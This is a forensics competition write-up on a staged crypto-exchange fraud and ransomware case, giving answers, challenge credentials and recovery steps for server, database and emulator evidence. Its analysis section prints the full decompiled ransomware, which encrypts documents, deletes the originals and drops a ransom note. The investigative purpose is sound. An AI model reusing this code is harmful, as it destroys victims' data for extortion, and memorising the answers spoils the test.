VC container password: 2022.4th.changancup!
## No firewall circumvention here, dear reviewer
Background
Police in a certain locality received a report from a victim stating that they had been defrauded on a virtual-currency trading website. The site claimed to sell so-called "HT coin" for "USTD coin"; after the victim deposited funds, not only could the "HT coin" not be withdrawn or traded, but the victim's phone was also locked and held for ransom by malware. Based on the trading website provided by the victim, police obtained an image of the corresponding server and opened an investigation.
Evidence item 1
1. The SHA256 of evidence item 1 is
9E48BB2CAE5C1D93BAF572E3646D2ECD26080B70413DC7DC4131F88289F49E34
2. Analyze evidence item 1: what is the IP address of the technician who set up the server? Use that address to extract evidence item 2
172.16.80.100
3. In evidence item 1, the operating system release version number is
Method 1:
Method 2: redhat-release in the etc directory
4. In evidence item 1, the static IP address bound to the network card is
Method 1:
Method 2:
Old approach
Since it is static, just open the virtual network editor and set the VM's subnet to match
Then connect directly with Xshell
5. In evidence item 1, the directory storing the website jar files is (answer as an absolute path, e.g. "/home/honglian/")
One look at the shell history shows it
Transfer the files to the local machine and extract all of them (viewing them with jadx works fine too!)
This is preparation for the next question
6. In evidence item 1, the file name of the process listening on port 7000 is
cloud.jar
Open them one by one; port 7000 finally turns up in the cloud folder
Each config file here contains database information, with addresses starting with 192 and 172; note them down, they may be useful later
Try logging in
No luck!
7. In evidence item 1, the network port of the website admin backend page is (answer with digits, e.g. "100")
Found in evidence item 2
9090
At this point the website has to be brought up, but a lot of configuration is missing, so first jump to evidence item 3
Unlock evidence item 3 with the password found in evidence item 2
Evidence item 3 holds the spring.datasource.url starting with 172 that was mentioned in the jar files of evidence item 1
火眼 can't process it, so virtualize the image and analyze it with 取证大师 instead
Terminal commands show docker is present
Also present: zookeeper, mysql, kafka, redis and mongod
Check the network configuration; it is static as well
Since there is a sql file, try opening it
That confirms mysql runs inside docker
Start it directly
33050 is mapped to port 3306, which matches the jar configuration
So mysql can be started; the password is in the jar files
docker exec -it 8e /bin/bash
Cross-referencing with evidence item 2: 128 should be the backend, 133 the frontend
The login page was also found
Along with the site-building notes
#!/bin/bash
sleep 2s
echo "Starting Zookeeper"
nohup /data/install/apache/zookeeper-3.4.10/bin/zkServer.sh start &
sleep 2s
echo "Starting Kafka"
nohup /data/install/apache/kafka_2.12-1.0.1/bin/zookeeper-server-start.sh /data/install/apache/kafka_2.12-1.0.1/config/zookeeper.properties &
sleep 5s
nohup /data/install/apache/kafka_2.12-1.0.1/bin/kafka-server-start.sh /data/install/apache/kafka_2.12-1.0.1/config/server.properties &
echo "Finish"
#!/bin/bash
echo "Starting App: Cloud "
nohup java -jar /web/app/cloud.jar &
sleep 20s
echo "Starting App: market "
nohup java -jar /web/app/market.jar &
sleep 60s
echo "Starting App:exchange "
nohup java -jar /web/app/exchange.jar &
sleep 20s
echo "Starting App:admin"
nohup java -jar /web/app/admin-api.jar &
sleep 20s
echo "Starting App:ucenter"
nohup java -jar /web/app/ucenter-api.jar &
sleep 20s
echo "Starting WEB:WEB"
cd /web/app/web/
nohup npm run dev &
cd /web/app
echo "Starting WEB:admin"
cd /web/app/admin/
nohup npm run dev &
cd /web/app
echo "Finish"
Import the database backup from evidence item 2
Then import start.sh into /web
After importing, remember to chmod 777 to grant permissions
Then the backend services can be started with start.sh
Start the frontend the same way
Done
And the site frontend
8. In evidence item 1, the APK download address given on the website frontend page is (answer format: "https://www.forensix.cn/abc/def")
https://pan.forensix.cn/f/c45ca511c7f2469090ad/?dl=1
9. In evidence item 1, the encryption method of the password field in the user table (admin) used by the admin backend page is
MD5
The `in` method is found to be called
Search for it in the jar files
10. Analyze evidence item 1: the salt used by the admin backend login password hashing algorithm is
Jump to the definition
It is a global variable
It can be found in application.properties
Evidence item 2
11. In evidence item 2, the login password of the Windows account Web King is
135790
12. In evidence item 2, apart from evidence item 1, which other IP address was connected to remotely? Use that address to extract evidence item 3
172.16.80.128
13. In evidence item 2, the last command entered in PowerShell is
火眼 doesn't show it, so virtualize the image and look there
14. In evidence item 2, the file name of the downloaded source code of the website in the case is
ZTuoExchange_framework-master.zip
15. In evidence item 2, the password of the website admin backend root account is
root
16. In evidence item 2, the WSL distribution used by the technician is (answer format: windows 10.1)
Ubuntu 20.04
Or look in the wsl directory
Usually under users/appdata/local/package
17. In evidence item 2, the version number of the running database service is (answer format: 10.1)
8.0.30
Or check directly inside WSL
18. The initial password of the debian-sys-maint user of the above database is
/etc/mysql/debian.cnf
ZdQfi7vaXjHZs75M
Evidence item 3
19. The root account password of the evidence item 3 server is
Evidence item 2 connected remotely to evidence item 3; after resetting the password on evidence item 3 and logging in, the IP matches
h123456
20. In evidence item 3, the program name listening on port 33050 is
docker-proxy
21. Apart from MySQL, which of the following databases does the website depend on
Found earlier in the configuration files
redis
mongodb
22. In evidence item 3, the password of the MySQL root account is
Found earlier
shhl7001
23. In evidence item 3, the data directory of the MySQL database inside the container is
Analysis of the shell history shows the suspect viewed docker-compose.yml several times, in /data/mysql
/var/lib/mysql
[root@localhost mysql]# cat docker-compose.yml
version: '3'
services:
  mysql:
    image: "mysql:5.7.32"
    restart: always
    container_name: mysql57
    environment:
      MYSQL_ROOT_PASSWORD: shhl7001
      TZ: Asia/Shanghai
    command:
      --default-authentication-plugin=mysql_native_password
      --character-set-server=utf8mb4
      --collation-server=utf8mb4_general_ci
      --explicit_defaults_for_timestamp=true
      --lower_case_table_names=1
      --max_allowed_packet=128M
    ports:
      - 33050:3306
    volumes:
      - /data/mysql/db:/var/lib/mysql
      - /data/mysql/conf/my.cnf:/etc/mysql/my.cnf
Or search for common database data files
24. The MySQL database name used by the website in the case is
b1
25. How many users' phone numbers did the extortionist modify in the database? (answer with digits, e.g. "15")
3
26. The number of users the extortionist deleted from the database is (answer with digits, e.g. "15")
28
27. Restore the damaged database and analyze: apart from the technician, which other IP address logged into the admin backend? Use that address to extract evidence item 4
172.16.80.197
28. After restoring all deleted and modified data, the HT wallet address of the registered member with user id 500 is
cee631121c2ec9232f3a2f028ad5c89b
29. After restoring all deleted and modified data, how many users have the member level 'LV3' (answer with digits, e.g. "15")
There are duplicate rows
167-3=164
30. After restoring all deleted and modified data, which user IDs have no deposit records (answer with digits, multiple IDs separated by commas, e.g. "15,16,17")
SELECT DISTINCT id FROM b1.member WHERE b1.member.id NOT IN (SELECT member_id FROM b1.member_transaction)
318,989
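The NOT IN query above has one pitfall worth checking on a restored table: if any recovered member_transaction row ends up with a NULL member_id, NOT IN returns no rows at all, because a comparison against NULL is unknown rather than false. The added example below is not from the writeup; it uses an in-memory SQLite miniature of the two tables with constructed ids, not the b1 data, and contrasts NOT IN with the NULL-safe NOT EXISTS form.

```python
import sqlite3


def build_sample_db() -> sqlite3.Connection:
    """Constructed miniature of the two b1 tables, keeping only the columns the query needs."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE member(id INTEGER PRIMARY KEY);
        CREATE TABLE member_transaction(id INTEGER PRIMARY KEY, member_id INTEGER, amount REAL);
        INSERT INTO member(id) VALUES (1), (2), (3), (4);
        INSERT INTO member_transaction(member_id, amount) VALUES (1, 100), (2, 50), (1, 25);
    """)
    return conn


def ids_without_deposits_not_in(conn: sqlite3.Connection) -> list:
    """Same shape as the writeup's query: NOT IN against the member_id subquery."""
    rows = conn.execute(
        "SELECT DISTINCT id FROM member "
        "WHERE id NOT IN (SELECT member_id FROM member_transaction) ORDER BY id"
    )
    return [r[0] for r in rows]


def ids_without_deposits_not_exists(conn: sqlite3.Connection) -> list:
    """NULL-safe variant: a NULL member_id simply never matches any member."""
    rows = conn.execute(
        "SELECT m.id FROM member m "
        "WHERE NOT EXISTS (SELECT 1 FROM member_transaction t WHERE t.member_id = m.id) "
        "ORDER BY m.id"
    )
    return [r[0] for r in rows]


def demo() -> tuple:
    """Run both queries before and after a partially recovered row with NULL member_id appears."""
    conn = build_sample_db()
    clean = (ids_without_deposits_not_in(conn), ids_without_deposits_not_exists(conn))
    # Constructed: a transaction row whose member_id could not be recovered.
    conn.execute("INSERT INTO member_transaction(member_id, amount) VALUES (NULL, 10)")
    with_null = (ids_without_deposits_not_in(conn), ids_without_deposits_not_exists(conn))
    conn.close()
    return clean, with_null


if __name__ == "__main__":
    print(demo())  # (([3, 4], [3, 4]), ([], [3, 4]))
```

Before running the count on restored data, a quick `SELECT COUNT(*) FROM member_transaction WHERE member_id IS NULL` tells you whether the NOT IN form can be trusted.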
31. After restoring all deleted and modified data, how many transaction records were generated in total on 17 October 2022? (answer with digits, e.g. "15")
1000
32. After restoring all deleted and modified data, the total amount of USDT deposited on the website is (answer with digits, e.g. "15")
415710
Evidence item 4
33. The name of the Android emulator software used by the suspect is
夜神模拟器 (NoxPlayer)
34. In evidence item 4, the "boss"'s Alibaba Cloud account is
It turns out the file can be opened with an archive tool
Inside is a vmdk file; open it in 火眼
It is clear that this person is the boss
forensixtech1
35. The name of the VPN tool installed in evidence item 4 is
v2rayNG
36. The node IP recorded in the above VPN tool is
Same screenshot as above
38.68.135.18
37. In evidence item 4, the installation time of the screen recording software is
2022-10-19 10:50:27
38. For the recording named "s_20221019105129" in the above screen recorder, the original file name in the emulator storage is
Look in the folder
s_20221019105129
Found it
39. The phone number logged into the above screen recorder is
18645091802
The db file comes with a wal file; the wal file temporarily holds data waiting to be written into the database, so export the two together
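The remark about the wal file is worth demonstrating, because exporting only the main .db file silently drops the most recent writes. The following added example is not part of the writeup; the database, table and phone numbers are constructed. It builds a small SQLite database, commits some rows before switching to WAL mode and some after, then counts rows in two exports: one with only the .db file and one with the .db and -wal files together.

```python
import os
import shutil
import sqlite3
import tempfile


def make_recorder_db(path: str) -> sqlite3.Connection:
    """Constructed stand-in for an app database: three rows already in the main file,
    two later rows that exist only in the -wal file until a checkpoint runs."""
    conn = sqlite3.connect(path, isolation_level=None)  # autocommit: each statement commits on its own
    conn.execute("CREATE TABLE account(id INTEGER PRIMARY KEY, phone TEXT)")
    conn.executemany("INSERT INTO account(phone) VALUES (?)",
                     [("13800000001",), ("13800000002",), ("13800000003",)])
    conn.execute("PRAGMA journal_mode=WAL")  # from here on, commits are appended to recorder.db-wal
    conn.executemany("INSERT INTO account(phone) VALUES (?)",
                     [("13800000004",), ("13800000005",)])
    return conn


def count_accounts(db_path: str) -> int:
    """Open an exported copy the way an examiner would and count what it contains."""
    conn = sqlite3.connect(db_path)
    try:
        return conn.execute("SELECT COUNT(*) FROM account").fetchone()[0]
    finally:
        conn.close()


def export_and_count() -> tuple:
    """Return (rows visible with only the .db file, rows visible with .db plus -wal)."""
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "recorder.db")
        # Keep the live connection open: closing it would checkpoint and delete the WAL,
        # which is exactly the state an examiner does NOT get from a running device.
        live = make_recorder_db(src)
        only_db = os.path.join(tmp, "export_db_only")
        with_wal = os.path.join(tmp, "export_with_wal")
        os.mkdir(only_db)
        os.mkdir(with_wal)
        shutil.copy(src, only_db)
        shutil.copy(src, with_wal)
        shutil.copy(src + "-wal", with_wal)
        n_only = count_accounts(os.path.join(only_db, "recorder.db"))
        n_wal = count_accounts(os.path.join(with_wal, "recorder.db"))
        live.close()
        return n_only, n_wal


if __name__ == "__main__":
    print(export_and_count())  # (3, 5)
```

The same applies to the -shm file only as a convenience; SQLite rebuilds it, but the -wal file carries committed data that is nowhere else until a checkpoint writes it into the main file.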
40. In evidence item 4, the email address used to send the ransom email is
skterran@163.com
41. Analyze the encryption program: which language was it compiled from?
A global search shows the encryption and decryption programs are in the same directory
It is plainly Python
42. Analyze the encryption program: which file extensions does it encrypt?
Find a way to unpack it
Create a .py file and add the following code
"""
PyInstaller Extractor v1.9 (Supports pyinstaller 3.3, 3.2, 3.1, 3.0, 2.1, 2.0)
Author : Extreme Coders
E-mail : extremecoders(at)hotmail(dot)com
Web : https://0xec.blogspot.com
Date : 29-November-2017
Url : https://sourceforge.net/projects/pyinstallerextractor/
For any suggestions, leave a comment on
https://forum.tuts4you.com/topic/34455-pyinstaller-extractor/
This script extracts a pyinstaller generated executable file.
Pyinstaller installation is not needed. The script has it all.
For best results, it is recommended to run this script in the
same version of python as was used to create the executable.
This is just to prevent unmarshalling errors(if any) while
extracting the PYZ archive.
Usage : Just copy this script to the directory where your exe resides
and run the script with the exe file name as a parameter
C:\path\to\exe\>python pyinstxtractor.py <filename>
$ /path/to/exe/python pyinstxtractor.py <filename>
Licensed under GNU General Public License (GPL) v3.
You are free to modify this source.
CHANGELOG
================================================
Version 1.1 (Jan 28, 2014)
-------------------------------------------------
- First Release
- Supports only pyinstaller 2.0
Version 1.2 (Sept 12, 2015)
-------------------------------------------------
- Added support for pyinstaller 2.1 and 3.0 dev
- Cleaned up code
- Script is now more verbose
- Executable extracted within a dedicated sub-directory
(Support for pyinstaller 3.0 dev is experimental)
Version 1.3 (Dec 12, 2015)
-------------------------------------------------
- Added support for pyinstaller 3.0 final
- Script is compatible with both python 2.x & 3.x (Thanks to Moritz Kroll @ Avira Operations GmbH & Co. KG)
Version 1.4 (Jan 19, 2016)
-------------------------------------------------
- Fixed a bug when writing pyc files >= version 3.3 (Thanks to Daniello Alto: https://github.com/Djamana)
Version 1.5 (March 1, 2016)
-------------------------------------------------
- Added support for pyinstaller 3.1 (Thanks to Berwyn Hoyt for reporting)
Version 1.6 (Sept 5, 2016)
-------------------------------------------------
- Added support for pyinstaller 3.2
- Extractor will use a random name while extracting unnamed files.
- For encrypted pyz archives it will dump the contents as is. Previously, the tool would fail.
Version 1.7 (March 13, 2017)
-------------------------------------------------
- Made the script compatible with python 2.6 (Thanks to Ross for reporting)
Version 1.8 (April 28, 2017)
-------------------------------------------------
- Support for sub-directories in .pyz files (Thanks to Moritz Kroll @ Avira Operations GmbH & Co. KG)
Version 1.9 (November 29, 2017)
-------------------------------------------------
- Added support for pyinstaller 3.3
- Display the scripts which are run at entry (Thanks to Michael Gillespie @ malwarehunterteam for the feature request)
"""
from __future__ import print_function
import os
import struct
import marshal
import zlib
import sys
import imp
import types
from uuid import uuid4 as uniquename
class CTOCEntry:
def __init__(self, position, cmprsdDataSize, uncmprsdDataSize, cmprsFlag, typeCmprsData, name):
self.position = position
self.cmprsdDataSize = cmprsdDataSize
self.uncmprsdDataSize = uncmprsdDataSize
self.cmprsFlag = cmprsFlag
self.typeCmprsData = typeCmprsData
self.name = name
class PyInstArchive:
PYINST20_COOKIE_SIZE = 24 # For pyinstaller 2.0
PYINST21_COOKIE_SIZE = 24 + 64 # For pyinstaller 2.1+
MAGIC = b'MEI\014\013\012\013\016' # Magic number which identifies pyinstaller
def __init__(self, path):
self.filePath = path
def open(self):
try:
self.fPtr = open(self.filePath, 'rb')
self.fileSize = os.stat(self.filePath).st_size
except:
print('[*] Error: Could not open {0}'.format(self.filePath))
return False
return True
def close(self):
try:
self.fPtr.close()
except:
pass
def checkFile(self):
print('[*] Processing {0}'.format(self.filePath))
# Check if it is a 2.0 archive
self.fPtr.seek(self.fileSize - self.PYINST20_COOKIE_SIZE, os.SEEK_SET)
magicFromFile = self.fPtr.read(len(self.MAGIC))
if magicFromFile == self.MAGIC:
self.pyinstVer = 20 # pyinstaller 2.0
print('[*] Pyinstaller version: 2.0')
return True
# Check for pyinstaller 2.1+ before bailing out
self.fPtr.seek(self.fileSize - self.PYINST21_COOKIE_SIZE, os.SEEK_SET)
magicFromFile = self.fPtr.read(len(self.MAGIC))
if magicFromFile == self.MAGIC:
print('[*] Pyinstaller version: 2.1+')
self.pyinstVer = 21 # pyinstaller 2.1+
return True
print('[*] Error : Unsupported pyinstaller version or not a pyinstaller archive')
return False
def getCArchiveInfo(self):
try:
if self.pyinstVer == 20:
self.fPtr.seek(self.fileSize - self.PYINST20_COOKIE_SIZE, os.SEEK_SET)
# Read CArchive cookie
(magic, lengthofPackage, toc, tocLen, self.pyver) = \
struct.unpack('!8siiii', self.fPtr.read(self.PYINST20_COOKIE_SIZE))
elif self.pyinstVer == 21:
self.fPtr.seek(self.fileSize - self.PYINST21_COOKIE_SIZE, os.SEEK_SET)
# Read CArchive cookie
(magic, lengthofPackage, toc, tocLen, self.pyver, pylibname) = \
struct.unpack('!8siiii64s', self.fPtr.read(self.PYINST21_COOKIE_SIZE))
except:
print('[*] Error : The file is not a pyinstaller archive')
return False
print('[*] Python version: {0}'.format(self.pyver))
# Overlay is the data appended at the end of the PE
self.overlaySize = lengthofPackage
self.overlayPos = self.fileSize - self.overlaySize
self.tableOfContentsPos = self.overlayPos + toc
self.tableOfContentsSize = tocLen
print('[*] Length of package: {0} bytes'.format(self.overlaySize))
return True
def parseTOC(self):
# Go to the table of contents
self.fPtr.seek(self.tableOfContentsPos, os.SEEK_SET)
self.tocList = []
parsedLen = 0
# Parse table of contents
while parsedLen < self.tableOfContentsSize:
(entrySize, ) = struct.unpack('!i', self.fPtr.read(4))
nameLen = struct.calcsize('!iiiiBc')
(entryPos, cmprsdDataSize, uncmprsdDataSize, cmprsFlag, typeCmprsData, name) = \
struct.unpack( \
'!iiiBc{0}s'.format(entrySize - nameLen), \
self.fPtr.read(entrySize - 4))
name = name.decode('utf-8').rstrip('\0')
if len(name) == 0:
name = str(uniquename())
print('[!] Warning: Found an unamed file in CArchive. Using random name {0}'.format(name))
self.tocList.append( \
CTOCEntry( \
self.overlayPos + entryPos, \
cmprsdDataSize, \
uncmprsdDataSize, \
cmprsFlag, \
typeCmprsData, \
name \
))
parsedLen += entrySize
print('[*] Found {0} files in CArchive'.format(len(self.tocList)))
def extractFiles(self):
print('[*] Beginning extraction...please standby')
extractionDir = os.path.join(os.getcwd(), os.path.basename(self.filePath) + '_extracted')
if not os.path.exists(extractionDir):
os.mkdir(extractionDir)
os.chdir(extractionDir)
for entry in self.tocList:
basePath = os.path.dirname(entry.name)
if basePath != '':
# Check if path exists, create if not
if not os.path.exists(basePath):
os.makedirs(basePath)
self.fPtr.seek(entry.position, os.SEEK_SET)
data = self.fPtr.read(entry.cmprsdDataSize)
if entry.cmprsFlag == 1:
data = zlib.decompress(data)
# Malware may tamper with the uncompressed size
# Comment out the assertion in such a case
assert len(data) == entry.uncmprsdDataSize # Sanity Check
with open(entry.name, 'wb') as f:
f.write(data)
if entry.typeCmprsData == b's':
print('[+] Possible entry point: {0}'.format(entry.name))
elif entry.typeCmprsData == b'z' or entry.typeCmprsData == b'Z':
self._extractPyz(entry.name)
def _extractPyz(self, name):
dirName = name + '_extracted'
# Create a directory for the contents of the pyz
if not os.path.exists(dirName):
os.mkdir(dirName)
with open(name, 'rb') as f:
pyzMagic = f.read(4)
assert pyzMagic == b'PYZ\0' # Sanity Check
pycHeader = f.read(4) # Python magic value
if imp.get_magic() != pycHeader:
print('[!] Warning: The script is running in a different python version than the one used to build the executable')
print(' Run this script in Python{0} to prevent extraction errors(if any) during unmarshalling'.format(self.pyver))
(tocPosition, ) = struct.unpack('!i', f.read(4))
f.seek(tocPosition, os.SEEK_SET)
try:
toc = marshal.load(f)
except:
print('[!] Unmarshalling FAILED. Cannot extract {0}. Extracting remaining files.'.format(name))
return
print('[*] Found {0} files in PYZ archive'.format(len(toc)))
# From pyinstaller 3.1+ toc is a list of tuples
if type(toc) == list:
toc = dict(toc)
for key in toc.keys():
(ispkg, pos, length) = toc[key]
f.seek(pos, os.SEEK_SET)
fileName = key
try:
# for Python > 3.3 some keys are bytes object some are str object
fileName = key.decode('utf-8')
except:
pass
# Make sure destination directory exists, ensuring we keep inside dirName
destName = os.path.join(dirName, fileName.replace("..", "__"))
destDirName = os.path.dirname(destName)
if not os.path.exists(destDirName):
os.makedirs(destDirName)
try:
data = f.read(length)
data = zlib.decompress(data)
except:
print('[!] Error: Failed to decompress {0}, probably encrypted. Extracting as is.'.format(fileName))
open(destName + '.pyc.encrypted', 'wb').write(data)
continue
with open(destName + '.pyc', 'wb') as pycFile:
pycFile.write(pycHeader) # Write pyc magic
pycFile.write(b'\0' * 4) # Write timestamp
if self.pyver >= 33:
pycFile.write(b'\0' * 4) # Size parameter added in Python 3.3
pycFile.write(data)
def main():
if len(sys.argv) < 2:
print('[*] Usage: pyinstxtractor.py <filename>')
else:
arch = PyInstArchive(sys.argv[1])
if arch.open():
if arch.checkFile():
if arch.getCArchiveInfo():
arch.parseTOC()
arch.extractFiles()
arch.close()
print('[*] Successfully extracted pyinstaller archive: {0}'.format(sys.argv[1]))
print('')
print('You can now use a python decompiler on the pyc files within the extracted directory')
return
arch.close()
if __name__ == '__main__':
main()
In cmd:
python <script>.py <program>.exe
This yields the pyc files; decompile them with uncompyle6
uncompyle6 -o test.py test.pyc
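One caveat on the extractor's _extractPyz step above: it prepends a 12-byte header for any Python 3.3+ build, but from Python 3.7 (PEP 552) a .pyc header is 16 bytes (magic, flags, mtime, source size), so pyc files rebuilt from a 3.7+ executable can be rejected by the interpreter and by header-aware decompilers. The added example below is not part of the writeup or of pyinstxtractor. It builds the header for a given PyInstaller cookie version code, decoding both the older major*10+minor and the newer major*100+minor encodings, and verifies the 16-byte form by actually importing a rebuilt pyc with the running interpreter; the version codes and the source text used are constructed.

```python
import importlib.machinery
import importlib.util
import marshal
import os
import struct
import sys
import tempfile


def split_pyver(pyver: int) -> tuple:
    """Decode the version code stored in the PyInstaller cookie (e.g. 27, 36, 37 or 310)."""
    if pyver >= 100:
        return pyver // 100, pyver % 100
    return pyver // 10, pyver % 10


def pyc_header(pyver: int, magic: bytes, mtime: int = 0, source_size: int = 0) -> bytes:
    """Header layout a .pyc must carry for the Python version that built the executable."""
    major, minor = split_pyver(pyver)
    if major < 3 or minor < 3:
        # Python 2.x and 3.0-3.2: magic + mtime (8 bytes)
        return magic + struct.pack('<I', mtime)
    if minor < 7:
        # Python 3.3-3.6: magic + mtime + source size (12 bytes); what the extractor writes
        return magic + struct.pack('<II', mtime, source_size)
    # Python 3.7+ (PEP 552): magic + flags (0 = timestamp based) + mtime + source size (16 bytes)
    return magic + struct.pack('<III', 0, mtime, source_size)


def running_pyver() -> int:
    """Version code of the interpreter running this script, in the major*100+minor encoding."""
    return sys.version_info.major * 100 + sys.version_info.minor


def build_pyc(source: str) -> bytes:
    """Compile constructed source and wrap the marshalled code object in a correct header."""
    code = compile(source, "<extracted>", "exec")
    return pyc_header(running_pyver(), importlib.util.MAGIC_NUMBER) + marshal.dumps(code)


def load_pyc(pyc_bytes: bytes):
    """Import the .pyc the way the interpreter would, so a wrong header length is caught."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "extracted.pyc")
        with open(path, "wb") as f:
            f.write(pyc_bytes)
        loader = importlib.machinery.SourcelessFileLoader("extracted", path)
        spec = importlib.util.spec_from_file_location("extracted", path, loader=loader)
        module = importlib.util.module_from_spec(spec)
        loader.exec_module(module)
        return module


if __name__ == "__main__":
    for code in (27, 36, 37, 310):
        print(code, split_pyver(code), len(pyc_header(code, b"\0\0\0\0")))
    mod = load_pyc(build_pyc("def answer():\n    return 42\n"))
    print(mod.answer())  # 42
```

When rebuilding pyc files by hand, take the magic from the PYZ header as the extractor does, but choose the header length from the decoded version, not from a single `>= 33` threshold.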
import time
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5
import os
pubkey = '-----BEGIN PUBLIC KEY-----\nMIIBIzANBgkqhkiG9w0BAQEFAAOCARAAMIIBCwKCAQEAx5JF4elVDBaakgGeDSxI\nCO1LyyZ6B2TgR4DNYiQoB1zAyWPDwektaCfnvNeHURBrw++HvbuNMoQNdOJNZZVo\nbHVZh+rCI4MwAh+EBFUeT8Dzja4ZlU9E7jufm69TQS0PSseIiU/4Byd2i9BvIbRn\nHLFZvi/VXphGeW0qVeHkQ3Ll6hJ2fUGhTsuGLc1XXHfiZ4RbJY/AMnjYPy9CaYzi\nSOT4PCf/O12Kuu9ZklsIAihRPl10SmM4IRnVhZYYpXedAyTcYCuUiI4c37F5GAhz\nRDFn9IQ6YQRjlLjuOX8WB6H4NbnKX/kd0GsQP3Zbogazj/z7OM0Y3rv3T8mtF6/I\nkwIEHoau+w==\n-----END PUBLIC KEY-----\n'
msg = "SOMETHING WENT WRONG,PLEASE CONTACT YOUR SYSTEM ADMINISTRATOR!\nHe can help you to understand whats happened.\nIf he can't help you,contact us via email:\naa1028@forensix.cn\nale@forensix.cn\nHURRY UP!WE HAVE ANTIDOTE FOR YOUR FILES!DISCOUNT 20%FOR CLIENTS,WHO CONTACT US IN THE SAME DAY!\nYou can attach 2 files (text or picture)to check our honest intentions,we will heal them and send\nback.\nPlease pay 0.618 ETH\nThe wallet address:0xef9edf6cdacb7d925aee0f9bd607b544c5758850\n************************************\n"

class XORCBC:

    def __init__(self, key: bytes):
        self.key = bytearray(key)
        self.cur = 0

    def encrypt(self, data: bytes) -> bytes:
        data = bytearray(data)
        for i in range(len(data)):
            tmp = data[i]
            data[i] ^= self.key[self.cur]
            self.key[self.cur] = tmp
            self.cur = (self.cur + 1) % len(self.key)
        return bytes(data)


print('加密程序V1.0')
print('文件正在加密中~~~~~~~~~~~~~~~~~~\n')

def run_finall():
    for filepath, dirnames, filenames in os.walk(os.getcwd()):
        for filename in filenames:
            if filename != 'encrypt_file.py' and filename != 'decrypt_file.py' and '_encrypted' not in filename:
                ExtensionPath = os.path.splitext(filename)[(-1)]
                if '.txt' == ExtensionPath or '.jpg' == ExtensionPath or '.xls' == ExtensionPath or '.docx' == ExtensionPath:
                    time.sleep(3)
                    data_file = os.path.join(filepath, filename)
                    rsakey = RSA.import_key(pubkey)
                    cipher = Cipher_pkcs1_v1_5.new(rsakey)
                    xor_key = os.urandom(16)
                    xor_obj = XORCBC(xor_key)
                    outf = open(data_file + '_encrypted', 'wb')
                    encrypted_xor_key = cipher.encrypt(xor_key)
                    outf.write(encrypted_xor_key)
                    buffer_size = 4096
                    with open(data_file, 'rb') as (f):
                        while True:
                            data = f.read(buffer_size)
                            if not data:
                                break
                            outf.write(xor_obj.encrypt(data))
                    outf.close()
                    os.remove(data_file)


run_finall()

def redme():
    try:
        dir = os.path.join(os.path.expanduser('~'), 'Desktop')
        print(dir)
        with open(dir + '/!READ_ME.txt', 'w') as (ff):
            ff.write(msg)
    except:
        dir1 = os.getcwd()
        print(dir1)
        with open(dir1 + '/!READ_ME.txt', 'w') as (ff):
            ff.write(msg)


print('\n加密完成~~~~~~~~~~~~~~~~~~')
os.system('pause')
# okay decompiling encrypt_file_1.pyc
txt,jpg,xls,docx
43. Analyze the encryption program: what algorithm does it use to encrypt the files?
XOR
^= is the XOR-assignment operator
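To see why the decrypt program works and, more usefully for incident response, how weak this construction is, here is an added example. It is not code from the writeup or from the malware author; only the XORCBC logic is re-typed from the decompiled program above, and the sample key and plaintext are constructed. It shows that the "CBC" feedback makes every ciphertext byte from position 16 onward equal to the plaintext byte XORed with the plaintext byte 16 positions earlier, so a victim who knows the first 16 bytes of a file (a fixed format header, for example) can recover the whole file, and the random key itself, without the RSA private key at all.

```python
class XORCBC:
    """Same stream construction as the malware's XORCBC class (re-typed for this demo)."""

    def __init__(self, key: bytes):
        self.key = bytearray(key)
        self.cur = 0

    def encrypt(self, data: bytes) -> bytes:
        data = bytearray(data)
        for i in range(len(data)):
            tmp = data[i]
            data[i] ^= self.key[self.cur]
            self.key[self.cur] = tmp  # feedback: the key slot now holds the plaintext byte
            self.cur = (self.cur + 1) % len(self.key)
        return bytes(data)

    def decrypt(self, data: bytes) -> bytes:
        data = bytearray(data)
        for i in range(len(data)):
            data[i] ^= self.key[self.cur]
            self.key[self.cur] = data[i]  # after the XOR, data[i] is the plaintext byte again
            self.cur = (self.cur + 1) % len(self.key)
        return bytes(data)


def encrypt_in_chunks(plaintext: bytes, key: bytes, chunk: int = 7) -> bytes:
    """Mimic the malware's 4096-byte read loop with a small chunk: state carries across calls."""
    enc = XORCBC(key)
    return b"".join(enc.encrypt(plaintext[i:i + chunk]) for i in range(0, len(plaintext), chunk))


def roundtrip(plaintext: bytes, key: bytes) -> bytes:
    return XORCBC(key).decrypt(encrypt_in_chunks(plaintext, key))


def recover_without_key(ciphertext: bytes, known_prefix: bytes, key_len: int = 16) -> bytes:
    """Because slot (i mod 16) was overwritten with p[i-16] at step i-16,
    c[i] = p[i] ^ p[i-16] for every i >= 16. The first 16 plaintext bytes unlock the rest."""
    if len(known_prefix) < min(key_len, len(ciphertext)):
        raise ValueError("need at least key_len known plaintext bytes")
    plain = bytearray(known_prefix[:key_len])
    for i in range(key_len, len(ciphertext)):
        plain.append(ciphertext[i] ^ plain[i - key_len])
    return bytes(plain[:len(ciphertext)])


def recover_xor_key(ciphertext: bytes, known_prefix: bytes, key_len: int = 16) -> bytes:
    """The original random key is just ciphertext XOR plaintext over the first 16 bytes."""
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_prefix[:key_len]))


# Constructed sample inputs (the real program uses os.urandom(16) and the victim's files).
SAMPLE_KEY = bytes(range(16))
SAMPLE_PLAINTEXT = b"header:constructed sample document body, repeated " * 4

if __name__ == "__main__":
    ct = encrypt_in_chunks(SAMPLE_PLAINTEXT, SAMPLE_KEY)
    print(roundtrip(SAMPLE_PLAINTEXT, SAMPLE_KEY) == SAMPLE_PLAINTEXT)  # True
    print(recover_without_key(ct, SAMPLE_PLAINTEXT[:16]) == SAMPLE_PLAINTEXT)  # True
    print(recover_xor_key(ct, SAMPLE_PLAINTEXT[:16]) == SAMPLE_KEY)  # True
```

The practical consequence for a case like this: the 256-byte RSA blob at the start of each `_encrypted` file only matters if the first 16 plaintext bytes are unknown; for formats with a fixed header, recovery needs neither the password nor the private key.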
44. Analyze the encryption program: what are the last 5 characters of the public key of the asymmetric cipher it uses?
u+w==
45. In the encrypted documents, the value of FLAG1 is (FLAG is an 8-character string, e.g. "FLAG9:QWERT123")
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5
import os
